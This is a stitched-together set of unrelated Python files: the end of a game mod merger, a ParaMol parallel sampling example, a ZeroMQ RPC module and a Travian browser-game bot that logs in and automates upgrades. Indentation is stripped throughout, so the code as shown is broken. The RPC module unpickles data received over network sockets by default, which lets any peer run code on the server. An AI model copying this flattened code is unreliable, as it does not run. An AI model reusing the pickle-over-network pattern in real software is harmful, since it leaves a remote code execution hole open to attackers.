plog( ' Performing Quick Search for Pak Containing File: {0}'.format( filepath ) )
result = self.search( filepath, self.quick_search_dict )
if result:
plog( ' Quick Search Found Pak File.' )
plog( ' Looking for {0} in Pak File.'.format( filepath ) )
else:
plog( ' Quick Search Failed.' )
return result
def make_omnipak(self):
plog('')
plog( '~=Building omni-mod=~' )
plog( 'This may take awhile. Go get a snack and make some coffee.' )
#Cleanup old omni-mod and create new one.
if os.path.exists(self.omni_mod_path):
os.remove(self.omni_mod_path)
omni_mod = Pak( self.omni_mod_path )
#Cleanup report diffs folder.
for file in os.listdir(self.diff_report_folder):
os.remove(self.diff_report_folder + file)
#Iterate over all mods in the mods folder.
for mod_pak_filepath in self.mod_pak_paths:
plog('')
plog( 'Loading New Mod: {0}'.format( mod_pak_filepath ) )
mod_pak = self._file_to_pak( mod_pak_filepath )
for mod_pak_file_index in range( len( mod_pak.files ) ):
mod_file = mod_pak.files[ mod_pak_file_index ]
if mod_file.ext not in self.non_mergeable_types:
original_game_pak_paths = self.lightning_search( mod_file.filepath ) or self.quick_search( mod_file.filepath )
mod_file_in_omni_mod = False
for original_game_pak_filepath in original_game_pak_paths:
original_game_pak = self._file_to_pak( original_game_pak_filepath )
plog( ' Searching in Game Pak: {0}'.format( original_game_pak.zip_path ) )
for original_game_file in original_game_pak.files:
if mod_file.filepath.lower() == original_game_file.filepath.lower():
plog( ' Found Game File.' )
plog('')
plog( ' Searching Omni-Mod for: {0}'.format( mod_file.filepath ) )
for omni_mod_file_index in range( len( omni_mod.files ) ):
omni_mod_file = omni_mod.files[ omni_mod_file_index ]
if ( mod_file.filepath.lower() == omni_mod_file.filepath.lower() ):
plog( ' Found Duplicate.' )
plog('')
mod_file_in_omni_mod = True
omni_mod.files[ omni_mod_file_index ] = self._merge_files( original_game_file, omni_mod_file, mod_file, mod_pak.zip_path )
break
if mod_file_in_omni_mod:
break
if mod_file_in_omni_mod:
break
if mod_file_in_omni_mod:
break
if not mod_file_in_omni_mod:
plog( ' Creating New File in Omni-Mod: {0}'.format( mod_file.filepath ) )
new_file = mod_file
new_file.filepath = new_file.filepath.lower()
omni_mod.files.append( new_file )
else:
plog( ' Handling non-mergeable filetype: {0}'.format( mod_file.filepath ) )
mod_file_in_omni_mod = False
for omni_mod_file_index in range( len( omni_mod.files ) ):
omni_mod_file = omni_mod.files[ omni_mod_file_index ]
if mod_file.filepath.lower() == omni_mod_file.filepath.lower():
plog( ' File already exists in Omni-Mod. Replacing file.' )
plog('')
mod_file_in_omni_mod = True
new_file = mod_file
new_file.filepath = new_file.filepath.lower()
omni_mod.files[ omni_mod_file_index ] = new_file
break
if not mod_file_in_omni_mod:
plog( ' Creating New File in Omni-Mod: {0}'.format( mod_file.filepath ) )
plog('')
new_file = mod_file
new_file.filepath = new_file.filepath.lower()
omni_mod.files.append( new_file )
omni_mod.write()
def _merge_files(self, original_game_file, omni_mod_file, mod_file, mod_pak_name):
new_file = File( original_game_file.filepath, omni_mod_file.contents )
plog( ' Merging in Mod File: {0}'.format( mod_file.filepath ) )
#TODO: Move accuracy and area out to a config file;
accuracy = 10
area_size = 5
new_file.contents = DiffCombiner( self.diff_report_folder,
original_game_file,
mod_file,
omni_mod_file,
mod_pak_name,
self.log_folder_path,
accuracy,
area_size ).combine()
return new_file
def _sort_mods_by_load_order(self):
plog('Sorting mods by load order')
mod_pak_paths = self.mod_pak_paths[:]
sorted_list = []
try:
with open(self.load_order_path, 'r') as load_order:
load_order = load_order.read().splitlines()
except FileNotFoundError:
with open(self.load_order_path, 'w') as load_order:
file = os.listdir( self.mod_files_filepath )
file_map = []
for filename in file[:]:
if filename[-4:] == '.pak' or filename[-4:] == '.zip':
file_map.append(filename)
load_order.write( '\n'.join( file_map ) )
with open(self.load_order_path, 'r') as load_order:
load_order = load_order.read().splitlines()
for load_order_list_element in load_order:
found_mod = False
for mod_pak_path in mod_pak_paths[:]:
if mod_pak_path == self.mod_files_filepath + load_order_list_element:
found_mod = True
sorted_list.append( mod_pak_paths.pop( mod_pak_paths.index(mod_pak_path) ) )
break
if not found_mod:
plog("Warning! Mod in load_order file but not in mods folder. Please delete load_order file after adding or removing mods.")
if mod_pak_paths:
plog("Warning! Mods in mods folder but not in load order file. Please delete load_order file after adding or removing mods.")
for _ in range( len( mod_pak_paths[:] ) ):
sorted_list.insert(0, mod_pak_paths.pop( 0 ) )
self.mod_pak_paths = sorted_list
def _get_paths( exe ):
log_folder_path = os.path.dirname( os.path.abspath('__file__') ) + os.sep + 'logs' + os.sep
init_plog( log_folder_path )
plog( 'exe_path = {0}'.format(exe), level=logging.DEBUG )
path_list = exe.split(os.sep)
path_list.pop()
path_list.append( 'user.cfg' )
usercfg = os.sep.join(path_list)
for i in range(3):
path_list.pop()
path_list.append('Data')
data_path = os.sep.join(path_list)
path_list.pop()
path_list.append('Localization')
localization_path = os.sep.join(path_list)
mods_path = os.path.dirname( os.path.realpath('__file__') ) + os.sep + 'mods' + os.sep
plog( 'included mods:', level=logging.DEBUG )
if not os.path.exists(mods_path):
os.makedirs(mods_path)
for mod in os.listdir( mods_path ):
plog( ' {0}'.format(mod), level=logging.DEBUG )
diff_report_folder_path = os.path.dirname( os.path.realpath('__file__') ) + os.sep + 'diff_reports' + os.sep
if not os.path.exists(diff_report_folder_path):
os.makedirs(diff_report_folder_path)
load_order_path = os.path.dirname( os.path.realpath('__file__') ) + os.sep + 'load_order.txt'
plog('load order:', level=logging.DEBUG)
if os.path.isfile(load_order_path):
with open(load_order_path, 'r') as load_order:
for line in load_order.read().splitlines():
plog(' {0}'.format( line ), level=logging.DEBUG)
else:
plog(' No load order file', level=logging.DEBUG)
return usercfg, data_path, localization_path, mods_path, diff_report_folder_path, log_folder_path, load_order_path
def play_loading_anim( started ):
global PLAYANIM
anim = [ '\\', '|', '/', '-' ]
PLAYANIM = True
while PLAYANIM:
for x in range( len(anim) ):
print ( 'Loading{0} Elapsed Time - {1} - Please allow up to 5 minutes for each mod.\r'.format( anim[ x ], datetime.datetime.now()-started, ), end='' )
time.sleep(0.3)
print(' '*100)
if __name__ == '__main__':
started = datetime.datetime.now()
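    # The 'config' file is plain text with one key=value pair per line; the only key
    # read here is exe_path, e.g. (path is purely illustrative):
    #   exe_path=C:\Games\KingdomCome\Bin\Win64\KingdomCome.exe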
with open('config', 'r') as file:
file = file.read().split('\n')
for line in file:
line = line.split('=')
if line[0] == 'exe_path':
exe = line[1]
#TODO: Make a server and ask the user if it's ok to send us data with 'add data is anonymous blah blah blah', if yes; on exception; send logfiles to server.
sys.excepthook = lambda *exc_info : plog( 'Exception raised:\n{0}'.format( ''.join(traceback.format_exception(*exc_info) ) ), level=logging.ERROR )
usercfg, data_path, localization_path, mods_path, diff_report_folder_path, log_folder_path, load_order_path = _get_paths(exe)
loading_anim_thread = threading.Thread( target=play_loading_anim, args = ( started, ) )
if not os.path.isfile( os.path.dirname( os.path.abspath('__file__') ) + os.sep + '.gitignore' ):
loading_anim_thread.start()
manager = Manager( data_path, mods_path, diff_report_folder_path, log_folder_path, load_order_path )
manager.populate_paks()
manager.make_omnipak()
PLAYANIM = False
try:
loading_anim_thread.join()
except RuntimeError:
pass
plog( 'Elapsed Time - {0}'.format( datetime.datetime.now() - started ) )
plog( 'Successfully Loaded All Mods' )
input( 'Press Enter/Return to close...' )
|
example_8_parallel.py
|
import simtk.unit as unit
import multiprocessing as mp
# ParaMol imports
from ParaMol.System.system import *
# ParaMol Tasks imports
from ParaMol.HMC.hmc_sampler import *
from ParaMol.Utils.settings import *
# --------------------------------------------------------- #
# Preparation #
# --------------------------------------------------------- #
system_names = ["aniline_{}".format(i) for i in range(4)]
systems = []
# Create four identical aniline systems
for name in system_names:
# Create the OpenMM engine for aniline
openmm_system = OpenMMEngine(init_openmm=True, topology_format='AMBER', top_file='aniline.prmtop', crd_format="AMBER", crd_file='aniline.inpcrd')
# Create ParaMol System
systems.append(ParaMolSystem(name=name, engine=openmm_system, n_atoms=14))
# Create ParaMol settings instance
paramol_settings = Settings()
# --------------------------------------------------------- #
# Set the QM Engine #
# --------------------------------------------------------- #
# Create the ASE calculator
from ase.calculators.dftb import *
calc = Dftb(Hamiltonian_='DFTB', # line is included by default
Hamiltonian_MaxSCCIterations=1000,
Hamiltonian_MaxAngularMomentum_='',
Hamiltonian_MaxAngularMomentum_H='s',
Hamiltonian_MaxAngularMomentum_C='p',
Hamiltonian_MaxAngularMomentum_N="p",
Hamiltonian_Dispersion="DftD3 { \n s6=1.000 \n s8=0.5883 \n Damping = BeckeJohnson { \n a1=0.5719 \n a2=3.6017 \n } \n }",
Hamiltonian_SCC='Yes',
Hamiltonian_SCCTolerance=1e-8, )
# Set the calculator in the settings
paramol_settings.qm_engine["ase"]["calculator"] = calc
# -------------------------------------------------------------- #
# Perform the nMC-MC Parallel Sampling #
# -------------------------------------------------------------- #
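# One sampler per system: each HMC task runs in its own process, so the four
# identical aniline systems are sampled independently and concurrently.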
HMC_samplers = [HMCSampler() for n in range(len(systems))]
output = mp.Queue()
processes_pool = []
for system, sampler in zip(systems, HMC_samplers):
hmc_kwargs = {"settings": paramol_settings,
"systems": [system],
"n_sweeps": 10000,
"n_steps_per_sweep": 100,
"temperature_pot_qm": unit.Quantity(300, unit.kelvin),
"temperature_pot_mm": unit.Quantity(300, unit.kelvin),
"temperature_kin_mm": unit.Quantity(300, unit.kelvin)}
processes_pool.append(mp.Process(target=sampler.run_task, kwargs=hmc_kwargs))
# Run processes
for sampler, system in zip(processes_pool, systems):
print("Starting HMC sampler of system {}".format(system.name))
sampler.start()
# Exit the completed processes
for sampler in processes_pool:
sampler.join()
# Write final data into file
for system in systems:
system.write_data()
|
vnrpc.py
|
# encoding: UTF-8
import threading
import traceback
import signal
import zmq
from msgpack import packb, unpackb
from json import dumps, loads
import pickle
pDumps = pickle.dumps
pLoads = pickle.loads
# Allow Ctrl-C to interrupt recv
signal.signal(signal.SIGINT, signal.SIG_DFL)
########################################################################
class RpcObject(object):
"""
RPC对象
提供对数据的序列化打包和解包接口,目前提供了json、msgpack、cPickle三种工具。
msgpack:性能更高,但通常需要安装msgpack相关工具;
json:性能略低但通用性更好,大部分编程语言都内置了相关的库。
cPickle:性能一般且仅能用于Python,但是可以直接传送Python对象,非常方便。
因此建议尽量使用msgpack,如果要和某些语言通讯没有提供msgpack时再使用json,
当传送的数据包含很多自定义的Python对象时建议使用cPickle。
如果希望使用其他的序列化工具也可以在这里添加。
"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
        # Default serialization tool: cPickle is used here (self.useMsgpack() is available as well)
#self.useMsgpack()
self.usePickle()
#----------------------------------------------------------------------
def pack(self, data):
"""打包"""
pass
#----------------------------------------------------------------------
def unpack(self, data):
"""解包"""
pass
#----------------------------------------------------------------------
def __jsonPack(self, data):
"""使用json打包"""
return dumps(data)
#----------------------------------------------------------------------
def __jsonUnpack(self, data):
"""使用json解包"""
return loads(data)
#----------------------------------------------------------------------
def __msgpackPack(self, data):
"""使用msgpack打包"""
return packb(data)
#----------------------------------------------------------------------
def __msgpackUnpack(self, data):
"""使用msgpack解包"""
return unpackb(data)
#----------------------------------------------------------------------
def __picklePack(self, data):
"""使用cPickle打包"""
return pDumps(data)
#----------------------------------------------------------------------
def __pickleUnpack(self, data):
"""使用cPickle解包"""
return pLoads(data)
#----------------------------------------------------------------------
def useJson(self):
"""使用json作为序列化工具"""
self.pack = self.__jsonPack
self.unpack = self.__jsonUnpack
#----------------------------------------------------------------------
def useMsgpack(self):
"""使用msgpack作为序列化工具"""
self.pack = self.__msgpackPack
self.unpack = self.__msgpackUnpack
#----------------------------------------------------------------------
def usePickle(self):
"""使用cPickle作为序列化工具"""
self.pack = self.__picklePack
self.unpack = self.__pickleUnpack
########################################################################
class RpcServer(RpcObject):
"""RPC服务器"""
#----------------------------------------------------------------------
def __init__(self, repAddress, pubAddress):
"""Constructor"""
super(RpcServer, self).__init__()
        # Functions available for remote calling: key is the function name, value is the function object
        self.__functions = {}
        # ZeroMQ sockets
        self.__context = zmq.Context()
        self.__socketREP = self.__context.socket(zmq.REP)   # request/reply socket
        self.__socketREP.bind(repAddress)
        self.__socketPUB = self.__context.socket(zmq.PUB)   # data broadcast (publish) socket
        self.__socketPUB.bind(pubAddress)
        # Worker thread
        self.__active = False                               # whether the server is running
        self.__thread = threading.Thread(target=self.run)   # server worker thread
#----------------------------------------------------------------------
def start(self):
"""启动服务器"""
# 将服务器设为启动
self.__active = True
# 启动工作线程
if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止服务器"""
# 将服务器设为停止
self.__active = False
# 等待工作线程退出
if self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""服务器运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketREP.poll(1000):
continue
# 从请求响应socket收取请求数据
reqb = self.__socketREP.recv()
# 序列化解包
req = self.unpack(reqb)
# 获取函数名和参数
name, args, kwargs = req
# 获取引擎中对应的函数对象,并执行调用,如果有异常则捕捉后返回
try:
func = self.__functions[name]
r = func(*args, **kwargs)
rep = [True, r]
except Exception as e:
rep = [False, traceback.format_exc()]
# 序列化打包
repb = self.pack(rep)
# 通过请求响应socket返回调用结果
self.__socketREP.send(repb)
#----------------------------------------------------------------------
def publish(self, topic, data):
"""
广播推送数据
topic:主题内容(注意必须是ascii编码)
data:具体的数据
"""
# 序列化数据
datab = self.pack(data)
# 通过广播socket发送数据
self.__socketPUB.send_multipart([topic, datab])
#----------------------------------------------------------------------
def register(self, func):
"""注册函数"""
self.__functions[func.__name__] = func
########################################################################
class RpcClient(RpcObject):
"""RPC客户端"""
#----------------------------------------------------------------------
def __init__(self, reqAddress, subAddress):
"""Constructor"""
super(RpcClient, self).__init__()
        # ZeroMQ sockets
        self.__reqAddress = reqAddress
        self.__subAddress = subAddress
        self.__context = zmq.Context()
        self.__socketREQ = self.__context.socket(zmq.REQ)   # request socket
        self.__socketSUB = self.__context.socket(zmq.SUB)   # broadcast subscription socket
        # Worker thread for handling data pushed by the server
        self.__active = False                               # whether the client is running
        self.__thread = threading.Thread(target=self.run)   # client worker thread
#----------------------------------------------------------------------
def __getattr__(self, name):
"""实现远程调用功能"""
# 执行远程调用任务
def dorpc(*args, **kwargs):
# 生成请求
req = [name, args, kwargs]
# 序列化打包请求
reqb = self.pack(req)
# 发送请求并等待回应
self.__socketREQ.send(reqb)
repb = self.__socketREQ.recv()
# 序列化解包回应
rep = self.unpack(repb)
# 若正常则返回结果,调用失败则触发异常
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
#----------------------------------------------------------------------
def start(self):
"""启动客户端"""
# 连接端口
self.__socketREQ.connect(self.__reqAddress)
self.__socketSUB.connect(self.__subAddress)
# 将服务器设为启动
self.__active = True
# 启动工作线程
if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止客户端"""
# 将客户端设为停止
self.__active = False
# 等待工作线程退出
if self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""客户端运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketSUB.poll(1000):
continue
# 从订阅socket收取广播数据
topic, datab = self.__socketSUB.recv_multipart()
# 序列化解包
data = self.unpack(datab)
# 调用回调函数处理
self.callback(topic, data)
#----------------------------------------------------------------------
def callback(self, topic, data):
"""回调函数,必须由用户实现"""
raise NotImplementedError
#----------------------------------------------------------------------
def subscribeTopic(self, topic):
"""
订阅特定主题的广播数据
可以使用topic=''来订阅所有的主题
注意topic必须是ascii编码
"""
self.__socketSUB.setsockopt(zmq.SUBSCRIBE, topic)
########################################################################
class RemoteException(Exception):
"""RPC远程异常"""
#----------------------------------------------------------------------
def __init__(self, value):
"""Constructor"""
self.__value = value
#----------------------------------------------------------------------
def __str__(self):
"""输出错误信息"""
return self.__value
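########################################################################
# Minimal usage sketch (not part of the original module; the tcp addresses
# and the exposed function are illustrative assumptions):
#
#   server = RpcServer('tcp://*:2014', 'tcp://*:4102')
#   server.register(sum)                          # expose a function by name
#   server.start()
#
#   class MyClient(RpcClient):
#       def callback(self, topic, data):          # must be implemented
#           print(topic, data)
#
#   client = MyClient('tcp://localhost:2014', 'tcp://localhost:4102')
#   client.subscribeTopic(b'')                    # subscribe to every topic
#   client.start()
#   print(client.sum([1, 2, 3]))                  # remote call via __getattr__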
|
account.py
|
import urllib
from urllib.request import urlopen
from urllib.parse import urlencode, quote
from http.cookiejar import CookieJar, FileCookieJar,LWPCookieJar
import sys
import pymongo
import re
import requests, pickle, http
from html import unescape
#import thread_file
import time
import threading
from bs4 import BeautifulSoup
class Account():
def __init__(self, username, *argv):
self.user = username
Account.argv = argv
if self.user == 'beetchplz':
self.dorf1 = 'https://ts4.travian.fr/dorf1.php'
Account.dorf1 = self.dorf1
Account.addr = 'https://ts4.travian.fr/'
elif self.user == 'lebibot':
self.dorf1 = 'https://tx10.mena.travian.com/dorf1.php'
Account.dorf1 = self.dorf1
Account.addr = 'https://tx10.mena.travian.com/'
else:
exit(1)
#self.cj = FileCookieJar()
try :
self.cookie_file_LWP = 'cookie_file'
self.cj = LWPCookieJar(self.cookie_file_LWP)
if not self.cj:
self.cj.load(self.cookie_file_LWP)
print('Cookie set.')
except :
print('error cookie')
self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cj))
Account.opener = self.opener
def connect_db(self):
myconnect = pymongo.MongoClient("mongodb://localhost:27017/")
print(myconnect)
Account.mydb = myconnect["travian-db"]
Account.name_farm_db = 'farm_{}'.format(self.user)
def init_user(self):
print("__init_user:")
users = self.mydb["users"]
print(type(users))
self.user_info = users.find_one({'username': self.user})
self.password = self.user_info['password']
def login(self):
self.connect_db()
self.init_user()
self.connect_with_cookie()
def connect_table(self, table_name):
table = self.mydb[table_name]
return table
def check_connection_result(self):
with open (self.file, 'r') as f:
page = f.read().replace('\n', '')
strings = re.findall(r'CONNEXION',page)
captcha = re.findall(r'captcha', page)
if ( strings == [] ):
print('Successfully connect ')
return 1
else:
print('Connection failed')
if (captcha.count('captcha') > 0):
print('get fucked by captcha')
print(captcha)
return 0
def connect_with_cookie(self):
if self.cj :
print ('trying to log with cookie')
#farm_page = self.opener.open('https://ts4.travian.fr/dorf1.php')
farm_page = self.opener.open(self.dorf1)
self.file = './dorf1.html'
try :
with open(self.file, 'w') as f:
f.write(farm_page.read().decode('utf-8'))
except IOError as e :
                print ('IOError({0}): {1}'.format(e.errno, e.strerror))
if self.check_connection_result():
return
else :
self.connect_with_credentials()
else :
print('no cookies go to connect_with_credentials')
self.connect_with_credentials()
def connect_with_credentials(self):
self.file = './connection.html'
print('Trying login with credentials.')
login_data = urlencode({'name' : self.user, 'password' : self.password, 's1': 'Se connecter', 'w': '1920:1080'})
#print(login_data.encode('utf-8'))
link = Account.addr + "/login.php?"
connected = self.opener.open(link, login_data.encode('utf-8'))
#print(connected.read().decode('utf-8'))
with open(self.file, 'w') as f:
f.write(connected.read().decode('utf-8'))
if self.check_connection_result():
self.cj.save()
return
else :
print('Exiting : All login method tried had failed..')
sys.exit(1)
class List(Account):
def __init__(self):
print('__init__ List')
List.list_upgrade = []
self.lvl_list = [1,2,3,4,5,6,7,8,9,10]
self.farm_list = ['fer','terre','fer','cc','all']
j = 0
if len(sys.argv) > 2:
for i in Account.argv[0]:
if j >= 2:
List.list_upgrade.append(i)
j = j +1
print(List.list_upgrade)
def check_entry(self, user_input):
arr = user_input.split()
farm = None
lvl = None
tmp = -1
#for i in user_input_array:
        if len(arr) > 1 and arr[1] in self.farm_list:
            farm = arr[1]
            if len(arr) > 2 and arr[2]:
try:
tmp = int(arr[2])
except:
print('error in parsing lvl')
else:
                print('not enough args')
if tmp in self.lvl_list:
lvl = tmp
else:
print('error in farm parsing ')
return
print('Farm : {} Lvl : {}'.format(farm, lvl))
if farm and lvl:
self.add_entry(user_input)
else:
print('error in parsing user entry ')
unser_entry = None
def handle_entry(self, user_input):
self.check_entry(user_input)
def add_entry(self, user_input):
List.list_upgrade.append(user_input)
print('new entry is : {}, list entry is : {}'.format( user_input, List.list_upgrade))
def check_user_list(self, user_input):
print(user_input)
if len(sys.argv) > 2 or user_input:
for i in List.list_upgrade:
print('check{}'.format(i))
if i in self.farm_list:
farm = i
print('found farm : ok ')
elif int(i) in self.lvl_list:
lvl = i
print('found lvl : ok')
else :
print('error in user entry')
return
return {'farm':farm, 'lvl' : lvl}
class Village(List):
def __init__(self):
pass
def check_number(self):
with open ('./dorf1.html', 'r') as f:
page = BeautifulSoup(f.read().replace('\n', ''), 'html.parser')
matches = re.finditer(r'class=\"slots\">.*?(\d|\d\d).*?span', str(page))
if not matches :
print('parsing village failed returning ')
return -1
for matchNum, match in enumerate(matches, start=1):
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
nb_village = int(match.group(groupNum))
return nb_village
def get_list_url(self):
list_url_village = []
with open ('./dorf1.html', 'r') as f:
page = BeautifulSoup(f.read().replace('\n', ''), 'html.parser')
matches = re.finditer(r'\?newdid=\d{3,6}&', str(page))
if not matches :
print('parsing village failed returning ')
return -1
for matchNum, match in enumerate(matches, start=1):
if matchNum != 1:
list_url_village.append(match.group())
return list_url_village
class Farm(Village):
def __init__(self):
print('__init__ Farm')
self.farms = Account.connect_table(self, Account.name_farm_db)
self.addr = Account.addr
self.opener = Account.opener
def parse_farm(self, id_village):
print("{}{}",id_village, self.get_list_url)
tmp_url_village = self.get_list_url()
url_village = tmp_url_village[id_village ]
link_village = "{}{}".format(Account.dorf1, url_village)
self.request('./dorf1.html', link_village , Account.dorf1)
with open ('./dorf1.html', 'r') as f:
page = f.read().replace('\n', '')
matches = re.finditer(r'class=\"( |notNow |good )level.*?colorLayer.*?level..', page)
'''
for matchNum, match in enumerate(matches, start=1):
print ("Match {matchNum} was found at {start}-{end}: {match}".format(matchNum = matchNum, start = match.start(), end = match.end(), match = match.group()))
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
print ("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = match.group(groupNum)))
'''
list_farm = []
i = 1
for matchNum, match in enumerate(matches, start=1):
clean_line = match.group(0)[7:].strip()
#print(clean_line)
status = re.match(r'^.*?level',clean_line)
status = status.group(0)
if status == 'level':
status = 'bad'
#print(status)
type_farm = re.search(r'gid.', clean_line).group(0)
type_gid = {'gid1': 'bois', 'gid2': 'terre', 'gid3': 'fer', 'gid4': 'cc' }
farm_type = type_gid[type_farm]
level = int(re.search(r'level\d(\d|)', clean_line).group(0).replace('level', ''))
farm_id = int(re.search(r'buildingSlot\d(\d|)', clean_line).group(0).replace('buildingSlot', ''))
link_farm = 'build.php?id={}'.format(farm_id)
list_farm.append({ 'id_farm' : farm_id, 'type' : farm_type, 'level' : level, 'status' : status, 'link_farm' : link_farm, 'evol' : level, 'id_village' : id_village})
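            # Each appended document looks like (values illustrative):
            # {'id_farm': 4, 'type': 'fer', 'level': 2, 'status': 'good ',
            #  'link_farm': 'build.php?id=4', 'evol': 2, 'id_village': 0}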
return list_farm
def parse_construct(self):
contruct_list = [{None}]
with open ('./dorf1.html', 'r') as f:
page = f.read().replace('\n', '')
matches = re.finditer(r'Centre du village</title.*?li>.*?ul>', page)
for matchNum, match in enumerate(matches, start=1):
print(match.group())
glob_match = match.group()
matches = re.finditer(r'class=\"name\">(.*?)<span.*?lvl\">(Niveau \d{1,2})</span', glob_match)
for matchNum, match in enumerate(matches, start=1):
print ("{} Match {matchNum} was found at {start}-{end}: {match}".format(len(match.groups()), matchNum = matchNum, start = match.start(), end = match.end(), match = match.group()))
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
print ("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = match.group(groupNum)))
def print_table(self, tablename):
table = Account.mydb[tablename]
for j in table.find():
print(j)
def retfarm(self):
return Account.mydb[Account.name_farm_db]
def create_farm_db(self, list_farm):
#farms = Account.mydb["farm"]
farms = self.farms
try :
farms.insert_many(list_farm)
except :
print('Duplicate id key, cannot insert value.')
return -1
print('All entry inserted')
def update_farm_reset(self,list_farm):
counter= 0
for i in list_farm:
tmp = self.farms.replace_one({"id_farm" : i['id_farm'], "id_village" : i["id_village"]}, i )
counter = counter + tmp.modified_count
if counter == 0 :
self.create_farm_db(list_farm)
def update_farm(self,list_farm):
print("__update_farm()")
counter= 0
for i in list_farm:
query = self.farms.find_one({ 'evol':{"$gt": i['level']}, "id_farm" : i['id_farm'], "id_village" : i["id_village"]})
if query:
print("{} is in construction".format(query))
if query is None:
tmp = self.farms.replace_one({"id_farm" : i['id_farm'], "id_village" : i["id_village"]}, i )
counter = counter + tmp.modified_count
else:
#print("conflict found : lvl query :{} {} lvl list :{} {} ".format(query['level'], type(query['level']), i['level'], type(i['level']) ))
if query and query['level'] != i['level']:
tmp = self.farms.replace_one({"id_farm" : i['id_farm'], "id_village" : i["id_village"]}, i )
counter = counter + tmp.modified_count
if not counter:
print('nothing to update')
else:
print("{} entry updated in farm".format(counter))
def request(self, file, link, referer):
header = urlencode([('Host', 'ts4.travian.fr'),
('Referer', 'https://ts4.travian.fr/build.php?id=4'),
('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Accept-Language', 'fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3'),
('Accept-Encoding','gzip, deflate, br'),
('Connection', 'keep-alive'),
('Referer', referer),
('Upgrade-Insecure-Requests', '1'),
('TE', 'Trailers')
])
self.opener.addheader = header.encode('utf-8')
req = self.opener.open(link)
with open(file, 'w') as f:
f.write(req.read().decode('utf-8'))
def lvl_up_all(self, levell, village):
id_village = village
level = int(levell)
print("lvlupall..")
query = self.farms.find_one({'level':{"$lt": level}, 'status' : {"$regex": "^good"}, 'evol' : {"$lt": level}, 'id_village' : id_village})
if query:
print("{} lvl {} en construction".format(query['type'], query['level']))
if not query:
ll = int(level)
queryy = self.farms.find_one({'level' : { "$lt" : ll}, 'id_village' : id_village})
if queryy is None :
print("all farms are lvl {}, deleting elem".format(level))
return -1
return 0
print(query)
#for i in query:
# print("- {} {} -".format(i['type'] , i['level']))
formated_addr = "{}{}".format(self.addr, query['link_farm'])
farm_update = self.opener.open(formated_addr)
self.file = 'update_farm.html'
with open(self.file, 'w') as f:
f.write(farm_update.read().decode('utf8'))
addr_args = self.parse_lvl_up(self.file)
if not addr_args:
return ;
link_update = self.addr +'dorf1.php?'+ addr_args
#dorf = self.opener.open(link_update)
query['evol'] = query['level'] + 1
tmp = self.farms.replace_one({"id_farm" : query['id_farm'], 'id_village' : id_village}, query )
counter = tmp.modified_count
if not counter:
print('nothing to update')
else:
print("{} entry updated in farm".format(counter))
self.request('dorf1.html', link_update, formated_addr)
def lvl_up(self, farm_type, level):
print('lvl_up() vv result_query vv')
query = self.farms.find_one({'type':farm_type})
print(query)
if query and query['level'] >= int(level):
print('all farm already at this lvl, deleting elem in list')
return -1
formated_addr = "{}{}".format(self.addr, query['link_farm'])
farm_update = self.opener.open(formated_addr)
self.file = 'update_farm.html'
with open(self.file, 'w') as f:
f.write(farm_update.read().decode('utf8'))
addr_args = self.parse_lvl_up(self.file)
if not addr_args:
return ;
link_update = self.addr +'dorf1.php?'+ addr_args
#dorf = self.opener.open(link_update)
print(link_update)
self.request('dorf1.html', link_update, formated_addr)
def parse_lvl_up(self, file):
print('parse_lvl_up()')
clean_line = None
with open (file, 'r') as f:
page = f.read().replace('\n', '')
matches = re.finditer(r"<but(.*?)niveau(.*?)dorf1\.php\?(.*?)';(.*?)Button", page)
## CAREFULL CAN USE GOLD
for matchNum, match in enumerate(matches, start=1):
clean_line = unescape(match.group(3))#[7:].strip()
break
if clean_line and ('b=') in clean_line:
print("GOLD WILL BE SPEND, CANCEL..")
clean_line = None
return clean_line
class Checker(Farm):
def __init__(self):
print('coucou')
print('__init__ Checker')
#self.farms = Farm.farms
self.farms = self.retfarm()
def is_spe_upgrade_avalible(self,farm_type, lvl):
#self.print_table('Farm')
query = self.farms.find({'status' : 'good level', 'type': farm_type, 'level': lvl})
if not query:
            print('No upgrade available')
return 0
else:
            print('upgrade {} lvl {} available'.format(farm_type, lvl))
return 1
def is_upgrade_avalible(self):
query = self.farms.find({'status' : 'good level'})
for i in query:
if not i:
print ("KO")
print(i)
if not query:
            print('No upgrade available')
return 0
else:
            print('upgrade available')
return 1
def check_elem_list(self, list_upgrade):
if self.is_upgrade_avalible() == 0 :
            print('0 upgrades available, cancel checker')
return
else :
print("got fucked")
k =0
for i in list_upgrade:
j = i.split()
print('{} {}'.format(i, j))
if k == 0 or j[-1] == '-':
if j[0][0] == 'v':
vivi = re.findall(r'\d+',j[0])
self.update_farm(self.parse_farm(int(vivi[0])))
if j[1] == 'all':
if self.lvl_up_all(j[2],int(vivi[0])) == -1 :
del list_upgrade[0]
k = k+1
'''arr = list_upgrade[0].split()
if arr[0] == 'del':
print("Deleting list")
list_upgrade = []
return
if arr[0][0] == 'v':
print ('okokok')
print(arr[0])
vivi = re.findall(r'\d+',arr[0])
print(vivi[0])
self.update_farm(self.parse_farm(int(vivi[0])))
if arr[1] == 'all':
if self.lvl_up_all(arr[2],int(vivi[0])) == -1 :
del list_upgrade[0]
else:
print("KO VVVV")'''
return
for i in list_upgrade:
if self.is_spe_upgrade_avalible(arr[0], arr[1]) == 1:
if self.lvl_up(arr[0], arr[1]) == -1:
del list_upgrade[0]
def check_list(self):
